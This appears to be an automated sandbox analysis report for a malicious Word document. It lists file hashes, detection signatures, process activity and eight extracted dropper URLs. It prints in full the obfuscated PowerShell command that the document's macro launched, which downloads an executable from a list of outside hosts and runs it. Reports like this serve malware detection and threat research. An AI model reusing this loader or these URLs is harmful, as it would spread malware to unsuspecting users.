Analysis

  • max time kernel
    133s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 19:19

General

  • Target

    d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc

  • Size

    239KB

  • MD5

    50bdb4343c0816c1908b32ff2ba9cea3

  • SHA1

    4ab1840794b41baf7c344663dc4013e45a3bc0ae

  • SHA256

    d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18

  • SHA512

    26f6db8694329f87e458da7fefef5e1a468f2b57aa1574e414ba20edb12c3c899f4cad69d17dec7752ff54880126ff69c3eba5491cae19d550887d373e2f1052

  • SSDEEP

    3072:Di8rNzbWOlrV1c231w8N6eXENf7KnEhJivKie6B/w2yiWydwJt3MP0iIepuxQt/:UJiP/w2P83NikmV

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tuankhoi.com/wp-content/CI2oG/

exe.dropper

https://www.microsystem.fr/newsletters/uITRJ/

exe.dropper

https://natfast.com/wp-content/geeVh/

exe.dropper

https://blog.smyrnaweb.com/cgi-bin/Kzd0vdC/

exe.dropper

https://mhkhardware.com/cgi-bin/Mrn/

exe.dropper

https://ostemeda.lt/wp-content/S/

exe.dropper

https://blog.techforing.com/wp-includes/3XgEg7/

exe.dropper

https://techzslack.com/wp-includes/gSXf/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d662e568c3ada720dad0aa0f17466949f6a185fd3c3f3fd2a239225864d50d18.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:392
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD     $ L E 5 b 0 o   =     [ t y P E ] ( " { 5 } { 1 } { 3 } { 0 } { 2 } { 4 } " - F   ' M . ' , ' y s T ' , ' i o . d i R e C T O ' , ' e ' , ' R y ' , ' S ' )     ; s e T   e h o   (     [ T y P E ] ( " { 7 } { 5 } { 4 } { 6 } { 1 } { 8 } { 2 } { 3 } { 0 } "   - F ' A g E R ' , ' S E R v ' , ' C e P O I N T ' , ' m A N ' , ' . N E ' , ' t e M ' , ' t . ' , ' s y S ' , ' i ' )   ) ;     $ M 7 i v 6 i 2 = ( ( ' V t v ' + ' 2 ' ) + ( ' h ' + ' p r ' ) ) ; $ Z 1 v b t n y = $ D n k 2 2 c s   +   [ c h a r ] ( 6 4 )   +   $ F 4 s c t i 2 ; $ F q u y f d x = ( ( ' Y 4 ' + ' z ' ) + ( ' n r ' + ' c q ' ) ) ;     $ L E 5 B 0 o : : " C ` R E A t ` E D i ` R e c t o R Y " ( $ H O M E   +   ( ( ' { ' + ' 0 } ' + ( ' G z c s 8 ' + ' b ' ) + ' 5 { 0 } E e m ' + ' p w r r { 0 } ' )   - f   [ c h A R ] 9 2 ) ) ; $ Q 9 l i h 2 p = ( ' J ' + ' 5 ' + ( ' n c ' + ' 1 y 2 ' ) ) ;   $ e h O : : " s e C ` U R i T y ` P R o t o ` C ` o L "   =   ( ( ' T ' + ' l s ' ) + ' 1 2 ' ) ; $ U d s 2 6 5 k = ( ' T ' + ' i ' + ( ' 4 0 o f ' + ' 9 ' ) ) ; $ U 4 7 u p 4 v   =   ( ' J ' + ( ' 3 p ' + ' w 9 s ' ) ) ; $ M b e k l 1 v = ( ( ' G b ' + ' d ' ) + ' u o ' + ' v z ' ) ; $ V x k s 0 0 q = ( ' F ' + ' 7 ' + ( ' j ' + ' z 9 j f ' ) ) ; $ C s 7 u q 4 r = $ H O M E + ( ( ' 1 6 ' + ( ' V G z ' + ' c ' ) + ( ' s 8 ' + ' b 5 1 ' ) + ( ' 6 V E e m ' + ' p ' ) + ( ' w r r ' + ' 1 6 V ' ) ) - c R E P l A c e     ( [ C h A r ] 4 9 + [ C h A r ] 5 4 + [ C h A r ] 8 6 ) , [ C h A r ] 9 2 ) + $ U 4 7 u p 4 v + ( ' . ' + ( ' e ' + ' x e ' ) ) ; $ H 4 a 1 2 t 0 = ( ( ' E 7 ' + ' t 8 ' ) + ' l ' + ' v u ' ) ; $ U g w g _ 3 v = . ( ' n e w ' + ' - o b j e ' + ' c t ' )   N E t . W E B c l I E n T ; $ L x d e h r a = ( ( ( ( ' h t t p : ] [   1 ) ' + '   j j k g S   [ ' + ' ] ' + '   ' ) ) + ( ( ' [ ] w ] [   1 ) ' + '   j j k g S   [ ]   [ ] w t u a n k ' + ' h o i . c o m ] [   1 )   ' + ' j j ' + ' k g S ' + '   [ ]   [ ] w w p ' + ' - c o n t e n ' + ' t ] ' + ' [   ' + ' 1 ' + ' )   j j ' + ' k g ' + ' S ' + '   [ ] ' + '   ' + ' [ ] w C I ' + ' 2 ' + ' o G ' + ' ] [   1 )   j ' + ' j k g S ' + '   [ ] ' + '   [ ] w @ h t t p ' + ' s : ] ' + ' [   1 ' + ' )   j j ' + ' k g ' + ' S   [ ]   [ ] ' + ' w ] ' + ' [   1 )   j j k g S ' + '   ' ) ) + ( ( ' [ ]   ' + ' [ ] w w w w . m i ' + ' c r o s ' + ' y ' + ' s t e ' + ' m . f ' + ' r ] [   ' + ' 1 )   j j ' + ' k g S   [ ]   [ ] w n e w s l e t t e r s ] ' + ' [   1 )   ' + ' j j k g ' + ' S   [ ] ' + '   ' + ' [ ] ' + ' w u ' + ' I ' + ' T ' + ' R J ' + ' ] [ ' + '   1 ' + ' )   j j ' ) ) + ( ( ' k g S   ' + ' [ ]   [ ] w @ h t t p s : ' + ' ] [ ' + '   1 )   j j k g S   [ ]   [ ] w ] [   1 )   j j ' + ' k g S ' + '   [ ]   [ ' + ' ] ' + ' w n ' + ' a ' ) ) + ( ( ' t f ' + ' a s t . c o m ' + ' ] [   1 ' + ' )   j j k g S ' + '   [ ] ' + '   [ ' + ' ] w ' + ' w p - ' + ' c ' + ' o n t e ' + ' n t ] [   1 )   ' + ' j ' + ' j ' + ' k ' ) ) + ( ( ' g S   ' + ' [ ] ' + '   ' + ' [ ' + ' ] ' + ' w g e ' + ' e V h ] ' + ' [   1 )   ' + ' j j k ' + ' g S   [ ]   [ ] w @ h t ' + ' t p s ' + ' : ] [   1 ' + ' )   j j k ' + ' g S ' + '   ' + ' [ ]   [ ] ' + ' w ] ' ) ) + ( ( ' [   ' + ' 1 )   ' + ' j j k g S ' + '   [ ]   [ ] w b l o ' + ' g . ' + ' s m y r ' + ' n a w e b ' ) ) + ( ( ' . c ' + ' o m ' + ' ] [   1 )   j j k g S   ' + ' [ ]   [ ] ' + ' w ' + ' c g i - ' + ' b i n ' + ' ] ' + ' [   1 ' + ' )   j j ' + ' k ' + ' g S ' + '   [ ' + ' ]   ' + ' [ ' + ' ] w K z ' + ' d 0 ' + ' v d C ] ' + ' [ ' + '   1 ) ' + '   j j k g S ' + '   [ ' + ' ]   [ ] w @ ' + ' h t t p s ' + ' : ] [   1 )   j j k g S   [ ]   ' + ' [ ] w ] [ ' + '   1 )   j j k g S   ' + ' [ ' + ' ]   [ ] w m ' + ' h k ' + ' h a ' + ' r d w a r e . c o m ] [   1 ) ' + '   j j k g S   [ ] ' ) ) + ( ( '   [ ] w c g i ' + ' - b i n ] [   1 )   ' + ' j ' + ' j k g ' + ' S   [ ] ' + '   [ ' + ' ] ' + ' w M r ' + ' n ] ' ) ) + ( ( ' [   1 )   ' + ' j ' + ' j ' + ' k g S   [ ]   [ ] w @ h ' + ' t t ' ) ) + ( ( ' p ' + ' s : ' + ' ] [   1 )   j j k g S ' + '   ' + ' [ ]   [ ] w ] [   1 )   j j ' + ' k g ' + ' S ' + '   [ ]   [ ' + ' ] w o ' + ' s t e m e d a . l ' + ' t ] ' ) ) + ( ( ' [   1 )   j j k ' + ' g ' + ' S   [ ] ' + '   [ ] w w p - c ' + ' o n t ' + ' e ' ) ) + ( ( ' n t ] [   1 )   j j ' + ' k g ' + ' S ' + '   ' ) ) + ( ( ' [ ]   [ ] w S ] ' + ' [   1 ) ' + '   j j k ' + ' g S   ' + ' [ ' + ' ]   [ ' + ' ] w @ h t t p s : ] ' + ' [   1 )   j j k g S ' + '   [ ] ' + '   [ ] w ] [   ' + ' 1 )   j j k g S   ' + ' [ ]   [ ] w b l ' + ' o g ' + ' . t e c h f o r i n g . ' + ' c ' + ' o m ' + ' ] [   ' + ' 1 ' + ' )   j j k g S ' + '   [ ]   [ ' ) ) + ( ( ' ] ' + ' w w p - i ' + ' n c l u ' + ' d e s ] [   ' + ' 1 )   j j k g S   [ ]   [ ] ' + ' w 3 X g E g 7 ] [ ' + '   1 )   j j ' + ' k g S ' + '   [ ]   ' + ' [ ] ' + ' w @ ' + ' h t t p s : ' + ' ] [   1 )   j j k g S   [ ' + ' ]   [ ] w ] [   1 )   j ' + ' j k g S ' + '   [ ' ) ) + ( ' ]   [ ] ' + ' w t e c h ' + ' z s l a ' + ' c ' ) + ( ' k . c o ' + ' m ' ) + ( ( ' ] [   1 )   j j k g ' + ' S ' + '   [ ]   [ ] ' + ' w w p - i n c l u ' + ' d e ' + ' s ' + ' ] ' ) ) + ( ( ' [   ' + ' 1 )   j j ' + ' k ' + ' g S   [ ]   [ ' ) ) + ( ( ' ] ' + ' w ' + ' g S X f ] [   1 ' + ' ) ' + '   j ' + ' j k g S   [ ' + ' ] ' ) ) + ( '   ' + ' [ ] w ' ) ) ) . " r e ` p l A C e " ( ( ( ( ' ] [ ' + '   1 ' ) + ( ( ' ) ' + '   j ' ) ) + ( ' j k g ' + ' S ' ) + '   ' + ( ' [ ]   ' + ' [ ] w ' ) ) ) , ( [ a r r a y ] ( ' / ' ) , ( ' x ' + ' w e ' ) ) [ 0 ] ) . " s p l ` i T " ( $ R 7 v 0 y a l   +   $ Z 1 v b t n y   +   $ P d c q r 7 o ) ; $ X q j w u 0 f = ( ( ' R _ m ' + ' c ' ) + ( ' q u ' + ' 2 ' ) ) ; f o r e a c h   ( $ Y c k z v l 8   i n   $ L x d e h r a ) { t r y { $ U g w g _ 3 v . " D O ` W N ` l o A d f i l E " ( $ Y c k z v l 8 ,   $ C s 7 u q 4 r ) ; $ I 1 a c y h _ = ( ( ' M s ' + ' f x ' ) + ( ' r ' + ' t 5 ' ) ) ; I f   ( ( . ( ' G e t - ' + ' I ' + ' t e m ' )   $ C s 7 u q 4 r ) . " L e ` N G ` T h "   - g e   3 5 4 2 9 )   { ( [ w m i c l a s s ] ( ( ' w i n 3 ' + ' 2 _ ' ) + ( ' P r o c ' + ' e ' ) + ' s s ' ) ) . " C R ` E ` A T E " ( $ C s 7 u q 4 r ) ; $ N a 6 m 0 _ 1 = ( ( ' H j y ' + ' y ' ) + ' i ' + ' d b ' ) ; b r e a k ; $ L d 2 7 m m z = ( ' Y e ' + ' c 5 ' + ( ' s 5 ' + ' g ' ) ) } } c a t c h { } } $ B v 9 t 7 k o = ( ' H ' + ( ' m o ' + ' 9 ' ) + ( ' l x ' + ' i ' ) ) 
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3628

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDF6B2.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ftv4udcq.sgj.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

    Filesize

    16B

    MD5

    d29962abc88624befc0135579ae485ec

    SHA1

    e40a6458296ec6a2427bcb280572d023a9862b31

    SHA256

    a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

    SHA512

    4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

  • memory/392-15-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-16-0x00007FF962230000-0x00007FF962240000-memory.dmp

    Filesize

    64KB

  • memory/392-5-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-6-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-8-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-12-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-11-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-10-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-13-0x00007FF962230000-0x00007FF962240000-memory.dmp

    Filesize

    64KB

  • memory/392-9-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-7-0x00007FF964350000-0x00007FF964360000-memory.dmp

    Filesize

    64KB

  • memory/392-1-0x00007FF9A436D000-0x00007FF9A436E000-memory.dmp

    Filesize

    4KB

  • memory/392-14-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-2-0x00007FF964350000-0x00007FF964360000-memory.dmp

    Filesize

    64KB

  • memory/392-26-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-27-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-0-0x00007FF964350000-0x00007FF964360000-memory.dmp

    Filesize

    64KB

  • memory/392-4-0x00007FF964350000-0x00007FF964360000-memory.dmp

    Filesize

    64KB

  • memory/392-103-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-3-0x00007FF964350000-0x00007FF964360000-memory.dmp

    Filesize

    64KB

  • memory/392-90-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-91-0x00007FF9A436D000-0x00007FF9A436E000-memory.dmp

    Filesize

    4KB

  • memory/392-92-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-102-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/392-96-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3628-95-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3628-71-0x000001A033120000-0x000001A033142000-memory.dmp

    Filesize

    136KB

  • memory/3628-64-0x00007FF9A42D0000-0x00007FF9A44C5000-memory.dmp

    Filesize

    2.0MB